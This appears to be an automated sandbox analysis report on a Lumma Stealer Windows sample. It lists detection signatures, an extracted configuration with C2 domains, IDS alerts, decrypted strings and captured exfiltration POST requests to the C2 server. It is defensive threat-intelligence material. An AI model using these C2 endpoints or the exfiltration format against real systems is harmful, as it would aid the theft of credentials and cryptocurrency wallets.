

Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546005
MD5: d6d4c4264450023d69bda4d017fe3771
SHA1: ce52488d60a985b5a6f66d87fd651a24945bba72
SHA256: 3da9dc898a09a8c3f35ddcda206e53a2da0be374de54145f3acf6c0d146a72c8
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6764 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D6D4C4264450023D69BDA4D017FE3771)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["fadehairucw.store", "necklacedmny.store", "presticitpo.store", "navygenerayk.store", "thumbystriw.store", "scriptyprefej.store", "crisiwarny.store", "founpiuer.store"], "Build id": "4SD0y4--legendaryy"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: file.exe PID: 6764 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 6764 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T11:28:07.028474+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.5 | 49713 | TCP
2024-10-31T11:28:45.280437+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.5 | 49912 | TCP
2024-10-31T11:27:50.935268+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:52.428175+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:53.818091+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:55.282025+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:56.680878+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:58.356580+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 188.114.96.3 | 443 | TCP
2024-10-31T11:28:00.140619+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | TCP
2024-10-31T11:28:02.159347+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49712 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:51.684144+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:52.922763+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:51.684144+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:52.922763+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:50.935268+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:52.428175+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:53.818091+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:55.282025+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:56.680878+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:58.356580+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49710 | 188.114.96.3 | 443 | TCP
2024-10-31T11:28:00.140619+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | TCP
2024-10-31T11:28:02.159347+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49712 | 188.114.96.3 | 443 | TCP
2024-10-31T11:27:50.209112+0100 | 2057129 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 60473 | 1.1.1.1 | 53 | UDP
2024-10-31T11:27:50.219788+0100 | 2057127 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 56136 | 1.1.1.1 | 53 | UDP
2024-10-31T11:27:50.254410+0100 | 2057123 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57112 | 1.1.1.1 | 53 | UDP
2024-10-31T11:27:50.193064+0100 | 2057131 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57098 | 1.1.1.1 | 53 | UDP
2024-10-31T11:27:50.243010+0100 | 2057125 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 52698 | 1.1.1.1 | 53 | UDP
2024-10-31T11:27:59.019842+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 188.114.96.3 | 443 | TCP


          AV Detection

Source: file.exe | Avira: detected
Source: file.exe.6764.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["fadehairucw.store", "necklacedmny.store", "presticitpo.store", "navygenerayk.store", "thumbystriw.store", "scriptyprefej.store", "crisiwarny.store", "founpiuer.store"], "Build id": "4SD0y4--legendaryy"}
Source: file.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: scriptyprefej.store
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: navygenerayk.store
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: founpiuer.store
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: necklacedmny.store
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: thumbystriw.store
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: fadehairucw.store
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crisiwarny.store
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: presticitpo.store
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: presticitpo.store
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4SD0y4--legendaryy
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2

          Networking

Source: Network traffic | Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:57112 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:60473 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:52698 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:57098 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49710 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49711 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49706 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49707 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:56136 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49712 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49709 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49710 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 188.114.96.3:443
Source: Malware configuration extractor | URLs: fadehairucw.store
Source: Malware configuration extractor | URLs: necklacedmny.store
Source: Malware configuration extractor | URLs: presticitpo.store
Source: Malware configuration extractor | URLs: navygenerayk.store
Source: Malware configuration extractor | URLs: thumbystriw.store
Source: Malware configuration extractor | URLs: scriptyprefej.store
Source: Malware configuration extractor | URLs: crisiwarny.store
Source: Malware configuration extractor | URLs: founpiuer.store
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49912
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49713
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 52
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12840
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15082
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20572
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1237
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 570133
    Host: necklacedmny.store
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: presticitpo.store
Source: global traffic | DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic | DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic | DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic | DNS traffic detected: DNS query: necklacedmny.store
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: necklacedmny.store
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
          Source: file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
          Source: file.exe, 00000000.00000002.2176009298.00000000057F2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172310521.00000000057F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store
          Source: file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/
          Source: file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140500751.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125885120.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126281997.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144388189.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/#
          Source: file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140500751.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125885120.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126281997.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144388189.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/K
          Source: file.exe, file.exe, 00000000.00000003.2169316679.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2174079269.0000000001015000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140595367.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172028798.0000000001015000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176031548.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2080663083.000000000106D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151922850.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140500751.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api
          Source: file.exe, 00000000.00000003.2169316679.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176031548.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151922850.0000000005801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api5
          Source: file.exe, 00000000.00000003.2169316679.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176031548.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151922850.0000000005801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api?
